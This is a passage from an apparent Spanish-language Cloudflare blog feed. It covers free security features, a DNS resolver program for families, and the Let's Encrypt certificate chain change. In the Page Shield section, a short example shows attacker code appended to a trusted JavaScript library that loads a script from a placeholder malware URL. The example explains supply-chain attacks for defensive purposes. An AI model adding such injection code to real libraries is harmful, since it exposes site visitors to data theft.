divulgación accidental de información debido a errores, evita que los desarrolladores expongan al azar puntos finales a través de un proceso no estándar y bloquea automáticamente las API zombies, ya que tu inventario de API se mantiene actualizado como parte de tu proceso de CI/CD.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3PMaRYLTwff6D7sdXRysJ7/728deb51cbec996c6741c428639b6900/image2.png" />
          </figure><p>Te sugerimos que utilices la <a href="https://developers.cloudflare.com/api/operations/api-shield-schema-validation-post-schema"><u>API</u></a> o el proveedor <a href="https://developers.cloudflare.com/api-shield/reference/terraform/"><u>Terraform</u></a> de Cloudflare para añadir puntos finales a Cloudflare API Shield y actualizar el esquema después de que se haya publicado tu código como parte de tu proceso de CI/CD posterior a la compilación. De esta forma, API Shield se convierte en una herramienta de inventario de API de referencia, y la <a href="https://developers.cloudflare.com/api-shield/security/schema-validation/"><u>validación de esquemas</u></a> se encargará de las solicitudes enviadas a tu API que no esperas.</p><p>Aunque las API tienen que ver con la integración con terceros, a veces las integraciones se realizan cargando bibliotecas directamente en tu aplicación. A continuación, ayudamos a mejorar la seguridad de la web protegiendo a los usuarios contra scripts maliciosos de terceros que roben información confidencial de las entradas en tus páginas.</p>
    <div>
      <h3>Prevención de ataques a la cadena de suministro</h3>
      <a href="#prevencion-de-ataques-a-la-cadena-de-suministro">
        
      </a>
    </div>
    <p>Las aplicaciones web modernas mejoran las experiencias de sus usuarios y reducen el tiempo de desarrollo mediante el uso de bibliotecas JavaScript de terceros. Debido a su nivel de acceso privilegiado a todo el contenido de la página, una biblioteca JavaScript de terceros en riesgo puede exfiltrar subrepticiamente información confidencial a un atacante sin que el usuario final o el administrador del sitio sea consciente de ello.</p><p>Para contrarrestar esta amenaza, lanzamos Page Shield <a href="https://blog.cloudflare.com/es-es/introducing-page-shield/"><u>hace tres años</u></a>. Ahora lanzamos Script Monitor de Page Shield de forma gratuita para todos nuestros usuarios.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5b6sxHcCLgIAHfb6Qub6NR/ae2f22ed1d2126804a5bc6e333d64fed/image3.png" />
          </figure><p>Con <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/page-shield"><u>Script Monitor</u></a>, verás <i>todos</i> los activos de JavaScript cargados en la página, no solo los que incluyeron tus desarrolladores. ¡Esta visibilidad incluye scripts cargados dinámicamente por otros scripts! Una vez que un atacante ha puesto en riesgo la biblioteca, es muy fácil añadir un nuevo script malicioso sin cambiar el contexto del HTML original y, en su lugar, incluir un nuevo código en el activo JavaScript existente incluido:</p>
            <pre><code>// Original library code (trusted)
function someLibraryFunction() {
    // useful functionality here
}

// Malicious code added by the attacker
let malScript = document.createElement('script');
malScript.src = 'https://example.com/malware.js';
document.body.appendChild(malScript);</code></pre>
            <p>Script Monitor fue esencial cuando se conoció la <a href="https://blog.cloudflare.com/polyfill-io-now-available-on-cdnjs-reduce-your-supply-chain-risk"><u>noticia del cambio de propiedad de la biblioteca pollyfill.io</u></a>. Los usuarios de Script Monitor tenían visibilidad inmediata de los scripts cargados en sus sitios y podían saber rápida y fácilmente si estaban en riesgo.</p><p>Estamos encantados de ampliar la visibilidad de estos scripts a la mayor parte de la web posible con el lanzamiento de Script Monitor para todos los clientes. Descubre cómo puedes empezar <a href="https://developers.cloudflare.com/page-shield/detection/monitor-connections-scripts/"><u>aquí en la documentación</u></a>.</p><p>Los usuarios existentes de Page Shield pueden filtrar inmediatamente los datos supervisados, sabiendo si su aplicación utiliza polyfill.io (o cualquier otra biblioteca). Además, <a href="https://blog.cloudflare.com/automatically-replacing-polyfill-io-links-with-cloudflares-mirror-for-a-safer-internet/"><u>desarrollamos una reescritura de polyfill.io</u></a> en respuesta al servicio en riesgo, que se activó automáticamente para los planes gratuitos en junio de 2024.</p>
    <div>
      <h3>Turnstile como extensión de Google Firebase </h3>
      <a href="#turnstile-como-extension-de-google-firebase">
        
      </a>
    </div>
    <p>Nos complace anunciar el <a href="https://developers.cloudflare.com/turnstile/extensions/google-firebase/"><u>proveedor de comprobación de aplicaciones Cloudflare Turnstile para Google Firebase</u></a>, que ofrece una eficaz integración sin necesidad de configuración manual. Con esta nueva extensión, los desarrolladores pueden crear aplicaciones móviles o web en Firebase para proteger sus proyectos contra los bots utilizando la alternativa de Cloudflare a CAPTCHA. Al aprovechar las capacidades de detección y desafío de bot de Turnstile, puedes garantizar que solo los visitantes que sean usuarios humanos auténticos interactúen con tus servicios de backend de Firebase, lo que mejora tanto la seguridad como la experiencia del usuario. Cloudflare Turnstile, una alternativa a CAPTCHA centrada en la privacidad, distingue entre usuarios humanos y bots sin perturbar la experiencia del usuario. A diferencia de las soluciones CAPTCHA tradicionales, que los usuarios suelen abandonar, Turnstile funciona de forma invisible y ofrece varios modos para garantizar interacciones fluidas con los usuarios.</p><p>La extensión de comprobación de aplicaciones de Firebase para Turnstile se integra fácilmente, lo que permite a los desarrolladores mejorar rápidamente la seguridad de las aplicaciones con una configuración mínima. Esta extensión también es gratuita con uso ilimitado con el nivel gratuito de Turnstile. Al combinar las ventajas de los servicios de backend de Google Firebase y Cloudflare Turnstile, los desarrolladores pueden ofrecer una experiencia segura y eficaz a sus usuarios. </p>
    <div>
      <h2>Cloudflare One</h2>
      <a href="#cloudflare-one">
        
      </a>
    </div>
    <p><a href="https://www.cloudflare.com/zero-trust/"><u>Cloudflare One</u></a> es una plataforma integral de <a href="https://www.cloudflare.com/learning/access-management/what-is-sase/"><u>perímetro de servicio de acceso seguro (SASE)</u></a> diseñada para proteger y conectar usuarios, aplicaciones, dispositivos y redes a través de Internet. Combina servicios como el acceso a la red Zero Trust (ZTNA), la puerta de enlace web segura (SWG) y muchos más en una única solución. Cloudflare One puede ayudar a todos a proteger a las personas y las redes, gestionar el control de acceso, proteger contra las ciberamenazas, salvaguardar sus datos y mejorar el rendimiento del tráfico de red direccionándolo a través de la red global de Cloudflare. Sustituye las medidas de seguridad tradicionales ofreciendo un enfoque basado en la nube para proteger y agilizar el acceso a los recursos corporativos.</p><p>Ahora todo el mundo tiene acceso gratuito a cuatro nuevos productos que se han añadido a Cloudflare One en los últimos dos años:</p><ul><li><p><i></i><a href="https://www.cloudflare.com/learning/access-management/what-is-a-casb/"><u>Agente de seguridad de acceso a la nube (CASB)</u></a> para mitigar el riesgo de las aplicaciones SaaS<i>.</i></p></li><li><p><i></i><a href="https://www.cloudflare.com/learning/access-management/what-is-dlp/"><u>Prevención de pérdida de datos (DLP)</u></a> para evitar que los datos confidenciales salgan de tu red y de tus aplicaciones SaaS<i>.</i></p></li><li><p><a href="https://www.cloudflare.com/learning/performance/what-is-digital-experience-monitoring/"><u>Digital Experience Monitoring</u></a> para ver la experiencia de un usuario cuando está en cualquier red.</p></li><li><p><i></i><a href="https://www.cloudflare.com/network-services/products/magic-network-monitoring/"><u>Magic Network Monitoring</u></a> para ver todo el tráfico que circula a través de tu red<i>.</i></p></li></ul><p>Esto se suma a los productos de seguridad de red existentes en la plataforma Cloudflare One:</p><ul><li><p><a href="https://www.cloudflare.com/learning/access-management/what-is-ztna/"><u>Access</u></a> para verificar la identidad de los usuarios y permitirles solo utilizar las aplicaciones que deben utilizar.</p></li><li><p><a href="https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/"><u>Gateway</u></a> para proteger el tráfico de red tanto de salida a la red pública como de entrada a tu red privada.</p></li><li><p><a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/"><u>Cloudflare Tunnel</u></a>, nuestros conectores de aplicaciones, que incluyen tanto cloudflared como WARP Connector, para conectar diferentes aplicaciones, servidores y redes privadas a la red de Cloudflare.</p></li><li><p><a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/warp/"><u>Cloudflare WARP</u></a>, nuestro agente de dispositivos, para enviar el tráfico de forma segura desde un portátil o dispositivo móvil a Internet.</p></li></ul><p>Cualquier persona con una cuenta de Cloudflare recibirá automáticamente 50 usuarios gratuitos en todos estos productos en su organización Cloudflare One. Visita nuestra <a href="https://www.cloudflare.com/plans/zero-trust-services/"><u>página de los planes Zero Trust y SASE</u></a> para obtener más información sobre nuestros productos gratuitos y para conocer nuestros planes de pago por uso y de contrato para equipos de más de 50 miembros.</p>
    <div>
      <h2>Autenticación con Google</h2>
      <a href="#autenticacion-con-google">
        
      </a>
    </div>
    <p>El propio panel de control de Cloudflare se ha convertido en un recurso vital que es necesario proteger, y dedicamos mucho tiempo a garantizar que las cuentas de usuario de Cloudflare no se vean comprometidas.</p><p>Para ello, hemos aumentado la seguridad añadiendo métodos de autenticación adicionales, como la autenticación en dos fases (2FA) basada en aplicaciones, las claves de acceso, el inicio de sesión único (SSO) y el inicio de sesión con Apple. Hoy añadimos la posibilidad de registrarse e iniciar sesión con una cuenta de Google. </p><p>Cloudflare admite varios flujos de trabajo de autenticación adaptados a distintos casos de uso. Aunque el inicio de sesión único y las claves de acceso son los métodos de autenticación preferidos y más seguros, creemos que proporcionar factores de autenticación más estrictos que las contraseñas llenará un vacío y aumentará la seguridad media general para nuestros usuarios. Iniciar sesión con Google facilita la vida de nuestros usuarios y evita que tengan que recordar otra contraseña cuando ya están navegando por la web con una identidad de Google.</p><p>El inicio de sesión con Google se basa en la especificación <a href="https://oauth.net/2/"><u>OAuth 2.0</u></a>, y permite a Google compartir de forma segura información de identificación sobre una identidad determinada, al mismo tiempo que garantiza que es Google quien proporciona esta información, evitando cualquier potencial suplantación de Google por parte de entidades maliciosas.</p><p>Esto significa que podemos delegar la autenticación a Google, evitando ataques de conocimiento cero directamente en esta identidad de Cloudflare.</p><p>Al llegar a la página de inicio de sesión de Cloudflare, verás el siguiente botón. Al hacer clic en él, podrás registrarte en Cloudflare y, una vez que te hayas registrado, podrás iniciar sesión sin escribir ninguna contraseña, utilizando la protección existente que hayas configurado en tu cuenta de Google.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6Sse03ivX432bBV01nfyUx/1ce8ace19aa3e4228735d1ca7bd3528c/Screenshot_2024-09-23_at_16.02.49.png" />
            
            </figure><p>Con el lanzamiento de esta función, Cloudflare utiliza ahora su propio Cloudflare Workers para proporcionar una capa de abstracción para proveedores de identidad compatibles con <a href="https://openid.net/developers/how-connect-works/"><u>OIDC</u></a> (como las cuentas de GitHub y Microsoft), lo que significa que nuestros usuarios pueden esperar ver más compatibilidad de conexión con <a href="https://www.cloudflare.com/learning/access-management/what-is-an-identity-provider/"><u>proveedores de identidad (IdP)</u></a> en el futuro.</p><p>En este momento, solo los nuevos clientes que se registren en Google podrán iniciar sesión con su cuenta de Google, pero implementaremos esta función para un mayor número de nuestros usuarios más adelante, con la capacidad de vincular y desvincular proveedores de inicio de sesión de redes sociales, y añadiremos métodos de inicio de sesión de redes sociales adicionales. Mientras consideramos cómo optimizar las políticas de Access e IdP que se han configurado para proteger tu entorno de Cloudflare, los usuarios Enterprise con una configuración de SSO establecida no podrán utilizar este método en este momento, y aquellos con una configuración de SSO establecida basada en Google Workspace serán reenviados a su flujo de SSO.</p><p>Si eres nuevo en Cloudflare y tienes una cuenta de Google, es más fácil que nunca empezar a utilizar Cloudflare para proteger tus sitios web, crear un nuevo servicio o probar cualquiera de los otros servicios que ofrece Cloudflare.</p>
    <div>
      <h2>Internet más seguro</h2>
      <a href="#internet-mas-seguro">
        
      </a>
    </div>
    <p>Uno de los objetivos de Cloudflare siempre ha sido democratizar las herramientas de ciberseguridad, para que todo el mundo pueda proporcionar contenidos y conectarse a Internet de forma segura, incluso sin los recursos de las grandes organizaciones empresariales.</p><p>Hemos decidido ofrecer un amplio conjunto de nuevas funciones de forma gratuita a todos los usuarios de Cloudflare, que abarcan una amplia variedad de casos de uso de seguridad, para administradores web, administradores de red y entusiastas de la ciberseguridad.

<a href="https://dash.cloudflare.com/"><u>Inicia sesión en tu cuenta de Cloudflare</u></a> para empezar a beneficiarte de estos anuncios hoy mismo. Nos encanta recibir comentarios en los <a href="https://community.cloudflare.com/"><u>foros de nuestra comunidad</u></a>, y nos comprometemos a mejorar tanto las funciones existentes como las nuevas funciones que estén disponibles más adelante.</p>
    <div>
      <h2>Ver en Cloudflare TV</h2>
      <a href="#ver-en-cloudflare-tv">
        
      </a>
    </div>
    <div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[Semana aniversario]]></category>
            <category><![CDATA[Seguridad]]></category>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[DLP]]></category>
            <category><![CDATA[Data Loss Prevention]]></category>
            <category><![CDATA[Información sobre amenazas]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[Page Shield]]></category>
            <category><![CDATA[Leaked Credential Checks]]></category>
            <category><![CDATA[SASE]]></category>
            <guid isPermaLink="false">3hUMWCRTsPTuqyUixn3aXp</guid>
            <dc:creator>Michael Tremante</dc:creator>
            <dc:creator>Reid Tatoris</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare se asocia con proveedores de acceso a Internet y proveedores de equipos de red para ofrecer una experiencia de navegación más segura a millones de hogares]]></title>
            <link>https://blog.cloudflare.com/es-es/safer-resolver/</link>
            <pubDate>Tue, 24 Sep 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare amplía el uso de nuestro solucionador de DNS público mediante la asociación con proveedores de acceso a Internet y proveedores de red para ofrecer una experiencia de navegación más segura directamente a las familias. Únete a nosotros para proteger a todos los usuarios de Internet frente al contenido no seguro, con solo un clic, con la tecnología 1.1.1.1 for Families. ]]></description>
            <content:encoded><![CDATA[ 
    <div>
      <h2>Un recorrido comprometido con la privacidad y la seguridad</h2>
      <a href="#un-recorrido-comprometido-con-la-privacidad-y-la-seguridad">
        
      </a>
    </div>
    <p>En 2018, Cloudflare <a href="https://blog.cloudflare.com/es-es/announcing-1111/"><u>anunció 1.1.1.1</u></a>, uno de los servicios de DNS para consumidores más rápidos y que prioriza la privacidad. 1.1.1.1 fue el primer producto de consumo que lanzó Cloudflare, cuyo objetivo era llegar a un público más amplio. Este servicio se diseñó para ser rápido y privado, y <a href="https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/"><u>no mantiene</u></a> información que pueda identificar quién realiza una solicitud. </p><p>En 2020, Cloudflare <a href="https://blog.cloudflare.com/introducing-1-1-1-1-for-families"><u>anunció 1.1.1.1 for Families</u></a>, diseñado para añadir una capa de protección a nuestro solucionador público 1.1.1.1 existente. Nuestro propósito con este producto era ofrecer a los consumidores, es decir, a las familias, la posibilidad de añadir un filtro de seguridad y de contenido para adultos a fin de bloquear el acceso de usuarios incautos a sitios específicos durante su navegación por Internet.</p><p>Hoy anunciamos oficialmente que cualquier proveedor de acceso a Internet y fabricante de equipos puede utilizar nuestros solucionadores de DNS de forma gratuita. Los proveedores de acceso a Internet, redes y equipos de hardware pueden inscribirse y unirse a este programa para asociarse con Cloudflare y ofrecer una experiencia de navegación más segura, fácil de usar, líder del sector y <b>gratuita para todos los usuarios</b>. </p><p>Las principales empresas ya se han asociado con Cloudflare para ofrecer soluciones mejores y personalizadas para proteger a sus clientes. Al ofrecer este servicio en un lugar familiar para el cliente, puedes ayudarnos a hacer de Internet un lugar seguro para todos. </p>
    <div>
      <h2>La necesidad de centrarse intencionadamente en las familias</h2>
      <a href="#la-necesidad-de-centrarse-intencionadamente-en-las-familias">
        
      </a>
    </div>
    <p>La COVID-19 planteó nuevos desafíos a partir de 2020, a medida que aumentaba la actividad en línea de los niños y la dependencia de las redes domésticas estaba más presente que nunca. Las investigaciones muestran que alrededor del <a href="https://www.pewresearch.org/internet/2020/07/28/childrens-engagement-with-digital-devices-screen-time/"><u>67 % de los adolescentes</u></a> tienen acceso a una tableta, y que niños de tan solo dos años acceden a contenido multimedia. Aunque a menudo es impresionante ver la facilidad con la que un niño pequeño puede navegar por un teléfono inteligente o una tableta y acceder a su programa favorito de YouTube, cada vez es más preocupante que los niños puedan encontrarse involuntariamente con contenido dañino durante esta actividad. </p><p>Nuestro lanzamiento de 1.1.1.1 for Families en 2020 proporcionó esa tranquilidad a los usuarios de todo el mundo, y sigue ofreciendo esa protección. Hoy en día, los hogares pueden configurar este servicio utilizando nuestra <a href="https://developers.cloudflare.com/1.1.1.1/setup/"><u>guía</u></a>. Pueden seleccionar el solucionador de DNS que quieren utilizar, centrándose solo en la privacidad, o incluir el bloqueo de las amenazas de seguridad y el contenido para adultos en toda su red doméstica.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/49EwOARWEuv8TfdzKdWpkc/bf53e440a69ae924ec09d806586ef567/image3.png" />
            
            </figure><p>Aunque este servicio está disponible y es gratuito para cualquier usuario, todavía hay muchos usuarios que navegan en línea a diario sin protección. Configurar una protección como esta puede resultar abrumador, y muchos usuarios no saben por dónde empezar o cómo configurarla en sus dispositivos o en su red doméstica. Hoy anunciamos una asociación que facilitará a los usuarios la instalación y la configuración.</p>
    <div>
      <h2>Asociación para ampliar aún más la seguridad </h2>
      <a href="#asociacion-para-ampliar-aun-mas-la-seguridad">
        
      </a>
    </div>
    <p>Los proveedores de acceso a Internet y los proveedores de red pueden utilizar los diferentes servicios de resolución de Cloudflare para ofrecer diversas soluciones a sus clientes. Nuestros socios existentes han tomado estas soluciones y las han incorporado en sus plataformas como una extensión de los servicios que ya están proporcionando a sus clientes. Este modelo integrado permite una fácil adopción y un recorrido coherente e integral para el cliente final. Cada servicio está diseñado con un propósito específico en mente, que se describe a continuación: </p><p><b>Nuestro principal solucionador de privacidad (1.1.1.1)</b> está diseñado para ofrecer velocidad y privacidad. Además, las solicitudes de DNS a nuestro solucionador público se pueden enviar a través de un canal seguro utilizando <a href="https://developers.cloudflare.com/1.1.1.1/encryption/dns-over-https/"><u>DNS sobre HTTPS (DoH)</u></a> o <a href="https://developers.cloudflare.com/1.1.1.1/encryption/dns-over-tls/"><u>DNS sobre TLS (DoT)</u></a>, lo que reduce significativamente las probabilidades de espionaje no deseado o ataques "monster-in-the-middle".</p><p><b>Nuestro solucionador de seguridad (1.1.1.2)</b> tiene todas las ventajas de 1.1.1.1, con la ventaja adicional de proteger a los usuarios de aquellos sitios que contienen malware, correo no deseado, ataques de comando y control de botnets o amenazas de phishing. </p><p><b>Nuestro solucionador para familias (1.1.1.3)</b> ofrece todas las ventajas de 1.1.1.2, con la ventaja adicional de bloquear el contenido para adultos no deseado tanto en la navegación directa a los sitios, como limitando los motores de búsqueda públicos solo a Búsqueda Segura. Esto evita que un usuario busque, sin saberlo, algo que pueda devolver un resultado no deseado. </p>
    <div>
      <h3>Seguridad Premium y personalizaciones </h3>
      <a href="#seguridad-premium-y-personalizaciones">
        
      </a>
    </div>
    <p>Si los usuarios quieren aún más flexibilidad que la que ofrecen nuestros solucionadores de DNS públicos, Cloudflare también ofrece un producto Gateway que permite el filtrado, la creación de informes, el registro, el análisis y la programación personalizados. Esta solución avanzada de <a href="https://www.cloudflare.com/lp/ppc/cloudflare-gateway-x/?utm_source=google&amp;utm_medium=cpc&amp;utm_campaign=ao-fy-acq-namer_en_na-umbrella-ge-ge-prospecting-sch_g_brand_alpha&amp;utm_content=Alpha_Brand_ZeroTrust_Gateway&amp;utm_term=cloudflare+gateway&amp;campaignid=71700000110566648&amp;adgroupid=58700008395369395&amp;creativeid=669303241127&amp;&amp;_bt=669303241127&amp;_bk=cloudflare%20gateway&amp;_bm=p&amp;_bn=g&amp;_bg=152212903387&amp;_placement=&amp;_target=&amp;_loc=9194681&amp;_dv=c&amp;awsearchcpc=1&amp;gad_source=1&amp;gclid=CjwKCAjw5qC2BhB8EiwAvqa41kCNIRA_o0KDeWYAgS3YmHunP3DCtEEkHlHM-lzAe02tb5kOLvdhVxoCFAUQAvD_BwE&amp;gclsrc=aw.ds"><u>Gateway</u></a> incluye más de <a href="https://developers.cloudflare.com/cloudflare-one/policies/gateway/domain-categories/"><u>114 categorías </u></a>que van desde redes sociales, plataformas de mensajería en línea, videojuegos y <a href="https://developers.cloudflare.com/cloudflare-one/policies/gateway/dns-policies/#safe-search"><u>resultados de "búsqueda segura"</u></a> hasta "hogar y jardín". </p><p>Los filtros adicionales y la funcionalidad de programación permiten a los usuarios ejercer controles más matizados y por hora, como limitar las redes sociales durante el horario escolar o la hora de la cena. </p><p>Si eres un proveedor de acceso a Internet o un fabricante de equipos y quieres ofrecer opciones fácilmente personalizables para tus clientes, tienes también esta opción. Tenemos un entorno multiinquilino disponible para nuestra solución Gateway con la que nuestros clientes pueden ofrecer a sus suscriptores individuales la capacidad de configurar sus propios filtros específicos para sus usuarios y hogares. Si eres un fabricante de dispositivos o un proveedor de acceso a Internet y quieres ofrecer protecciones personalizables para tus suscriptores individuales, esta puede ser una buena opción para ti.</p>
    <div>
      <h2>Nuestro compromiso continuo con la privacidad y la seguridad</h2>
      <a href="#nuestro-compromiso-continuo-con-la-privacidad-y-la-seguridad">
        
      </a>
    </div>
    
    <div>
      <h3>Una elección fácil </h3>
      <a href="#una-eleccion-facil">
        
      </a>
    </div>
    <p>En pocas palabras, Cloudflare es una opción fácil y obvia para proteger a los usuarios y las familias. Por eso, todas las empresas líderes han elegido asociarse con Cloudflare para ayudar a proteger a los clientes y a sus familias. En 2020, tras el lanzamiento de <a href="https://developers.cloudflare.com/1.1.1.1/setup/#1111-for-families"><u>1.1.1.1 for Families</u></a>, atendimos más de 200 000 millones de consultas DNS al día para 1.1.1.1. En la actualidad, atendemos 1,7 billones de consultas al día para 1.1.1.1 y <a href="https://www.cloudflare.com/network/"><u>nuestra presencia en la red abarca más de 330 ciudades y se interconecta con más de 12 500 redes distintas</u></a>. Esta red nos sitúa en un abrir y cerrar de ojos al alcance del 95 % de la población mundial conectada a Internet (tus clientes), lo que garantiza que reciban una velocidad ultrarrápida mientras navegan. </p><p>Más allá de nuestra velocidad, <a href="https://w3techs.com/technologies/overview/proxy/all"><u>casi el 20 % de todos los sitios web</u></a> de todo el mundo utilizan Cloudflare como proxy inverso.<a href="https://radar.cloudflare.com/"><u> Esto nos proporciona valiosa información sobre las últimas tendencias, amenazas e investigaciones de Internet</u></a>. Al asociarte con nosotros, puedes aprovechar nuestros puntos fuertes (una potente infraestructura, amplia información basa en datos y un equipo dedicado a la información sobre amenazas) mientras te centras en tus prioridades principales. No hay mejor socio que uno que ofrezca un alcance global, un rendimiento excelente y <a href="https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/"><u>privacidad integrada</u></a>. </p>
    <div>
      <h2>Únete a nosotros para facilitar una experiencia de navegación segura a todos los usuarios</h2>
      <a href="#unete-a-nosotros-para-facilitar-una-experiencia-de-navegacion-segura-a-todos-los-usuarios">
        
      </a>
    </div>
    <p>Cloudflare comenzó con el objetivo singular de ayudar a mejorar Internet, y nuestra Semana aniversario anual es un catalizador de muchos desarrollos que han definido la mejora de Internet para todos. </p><p>Seguimos comprometidos a ayudar a proteger y mejorar Internet para todos los usuarios, y para ello debemos adaptarnos a su situación, independientemente del punto en que se encuentren. Nuestras asociaciones son fundamentales para que esto se haga realidad, y queremos que formes parte de la solución con nosotros. </p><p>Tanto si te interesan nuestros solucionadores de DNS públicos como nuestras opciones más avanzadas de Gateway, Cloudflare tiene opciones sencillas y escalables para todos, ya sean usuarios individuales u organizaciones. Puedes registrarte hoy mismo para unirte a este programa como socio <a href="https://docs.google.com/forms/d/1WpvFILegBZ7V4RMK4pygP7PCpTgkxG1h-XafI9WHCW4/edit"><u>enviando este formulario</u></a>, y nos pondremos en contacto contigo para entender tus necesidades y ayudarte a participar.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4I2fgl2gyWQ7YVYVyL3xf1/ec25fbe8b8f0d86b7a6b184a5f0c08ac/image1.png" />
          </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Semana aniversario]]></category>
            <category><![CDATA[1.1.1.1]]></category>
            <category><![CDATA[Privacidad]]></category>
            <category><![CDATA[DNS]]></category>
            <category><![CDATA[Seguridad]]></category>
            <category><![CDATA[Socios]]></category>
            <category><![CDATA[Servicios de red]]></category>
            <guid isPermaLink="false">6ZZuN3gorGpsi4nPVR284G</guid>
            <dc:creator>Kelly May Johnston</dc:creator>
            <dc:creator>Morgan Steffen</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cómo Cloudflare evitará que los clientes se vean afectados por el próximo cambio en la cadena de certificados de Let's Encrypt con su sólida canalización de certificados]]></title>
            <link>https://blog.cloudflare.com/es-es/shortening-lets-encrypt-change-of-trust-no-impact-to-cloudflare-customers/</link>
            <pubDate>Fri, 12 Apr 2024 13:00:09 GMT</pubDate>
            <description><![CDATA[ La cadena de certificados con firma cruzada de Let's Encrypt expirará en septiembre. Esta novedad afectará a los dispositivos heredados con almacenes de confianza obsoletos ]]></description>
            <content:encoded><![CDATA[ <p><a href="https://letsencrypt.org/">Let's Encrypt</a>, una autoridad de certificación (CA) de confianza disponible para el público que Cloudflare utiliza para emitir certificados TLS, ha estado confiando en dos cadenas de certificados distintas. Una utiliza una firma cruzada con <a href="https://www.identrust.com/">IdenTrust</a>, una CA de confianza a nivel mundial que existe desde el año 2000, y la otra es la propia CA raíz de Let's Encrypt, ISRG Root X1. Desde el lanzamiento de Let's Encrypt, <a href="https://letsencrypt.org/certificates/#root-certificates">ISRG Root X1</a> ha ido consiguiendo de forma gradual su propia compatibilidad de dispositivos.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7xrPBUpEjsmaBkRYhxiRIr/c95f42fffef36c7d595422b4724c8665/Untitled--3--1.png" />
            
            </figure><p>La cadena de certificados de Let's Encrypt que utiliza una firma cruzada con IdenTrust <a href="https://letsencrypt.org/2023/07/10/cross-sign-expiration.html">expirará</a> el 30 de septiembre de 2024. A partir de ese momento, los servidores ya no podrán servir certificados firmados por la cadena con firma cruzada. En su lugar, todos los certificados de Let's Encrypt utilizarán la CA, ISRG Root X1.</p><p>La mayoría de los dispositivos y versiones de navegador lanzadas después de 2016 no se verán afectados por el cambio, ya que ISRG Root X1 ya estará instalado en los almacenes de confianza de esos clientes. La razón es que estos navegadores y sistemas operativos modernos se crearon para ser ágiles y flexibles, con almacenes de confianza que se pueden actualizar para incluir nuevas autoridades de certificación.</p><p>El cambio en la cadena de certificados afectará a los dispositivos y sistemas heredados, como los dispositivos que ejecutan la versión 7.1.1 de Android (lanzada en 2016) o anteriores, ya que dependen exclusivamente de la cadena con firma cruzada y carecen de la CA raíz ISRG X1 en su almacén de confianza. Estos clientes recibirán mensajes de error o advertencias de TLS cuando accedan a dominios protegidos por un certificado Let's Encrypt. Echamos un vistazo a los datos y descubrimos que, de todas las solicitudes de Android, el 2,96 % proceden de dispositivos que se verán afectados por el cambio. Esa es una parte sustancial del tráfico que perderá el acceso a Internet. Nos comprometemos a mantener a esos usuarios en línea y modificaremos nuestra canalización de certificados para que podamos seguir sirviendo a los usuarios en dispositivos más antiguos sin la necesidad de que tengan que realizar modificaciones manuales.</p>
    <div>
      <h3>Mejoramos Internet para todos</h3>
      <a href="#mejoramos-internet-para-todos">
        
      </a>
    </div>
    <p>En el pasado, dedicamos nuestros esfuerzos en iniciativas como <a href="/sha-1-deprecation-no-browser-left-behind/">"No Browsers Left Behind"</a> para ayudar a garantizar un soporte ininterrumpido a los clientes mientras los algoritmos basados en SHA-1 estaban quedando obsoletos. Ahora, estamos adoptando el mismo enfoque para el próximo cambio de Let's Encrypt.</p><p>Hemos tomado la decisión de eliminar Let's Encrypt como autoridad de certificación de todos los flujos en los que Cloudflare dicta la CA, lo que afecta a los clientes de Universal SSL y a aquellos que utilizan SSL for SaaS con la opción "CA por defecto".</p><p>A partir de junio de 2024, un ciclo de vida del certificado (90 días) antes de que caduque la cadena con firma cruzada, empezaremos a migrar los certificados de Let's Encrypt que estén pendientes de renovación a una CA diferente, una que garantice la compatibilidad con los dispositivos más antiguos afectados por el cambio. Esto significa que, en el futuro, los clientes solo recibirán certificados de Let's Encrypt si solicitan explícitamente a Let's Encrypt como CA.</p><p>El cambio que está realizando Let's Encrypt es necesario. Para que podamos avanzar en la compatibilidad con nuevos estándares y protocolos, tenemos que agilizar el ecosistema de la infraestructura de clave pública (PKI). Al eliminar la cadena con firma cruzada, Let's Encrypt permitirá la compatibilidad de los dispositivos, navegadores y clientes con almacenes de confianza adaptables.</p><p>Sin embargo, hemos observado <a href="/sha-1-deprecation-no-browser-left-behind/">cambios como este en el pasado</a> y, aunque impulsan la adopción de nuevos estándares, afectan de manera desproporcionada a los usuarios de regiones económicamente desfavorecidas, donde el acceso a la nueva tecnología es limitado.</p><p>Nuestra misión es ayudar a mejorar Internet, y eso significa ayudar a los usuarios de todo el mundo. Anteriormente publicamos una <a href="/upcoming-lets-encrypt-certificate-chain-change-and-impact-for-cloudflare-customers">entrada en el blog sobre el cambio de Let's Encrypt</a>, en la que pedíamos a los clientes que cambiaran de autoridad de certificación si esperaban verse afectados. Sin embargo, determinar el impacto del cambio es un desafío. Las tasas de error debido a la incompatibilidad del almacén de confianza se registran principalmente en el cliente, lo que reduce la visibilidad que tienen los propietarios de ese dominio. Además, aunque hoy no haya solicitudes entrantes de dispositivos incompatibles, no garantiza el acceso ininterrumpido de los usuarios en el futuro.</p><p>La canalización de certificados de Cloudflare ha evolucionado a lo largo de los años para ser resistente y flexible, lo que nos permite adaptarnos sin problemas a cambios como este sin que nuestros clientes se vean afectados.</p>
    <div>
      <h3>Cómo Cloudflare ha desarrollado una sólida canalización de certificados TLS</h3>
      <a href="#como-cloudflare-ha-desarrollado-una-solida-canalizacion-de-certificados-tls">
        
      </a>
    </div>
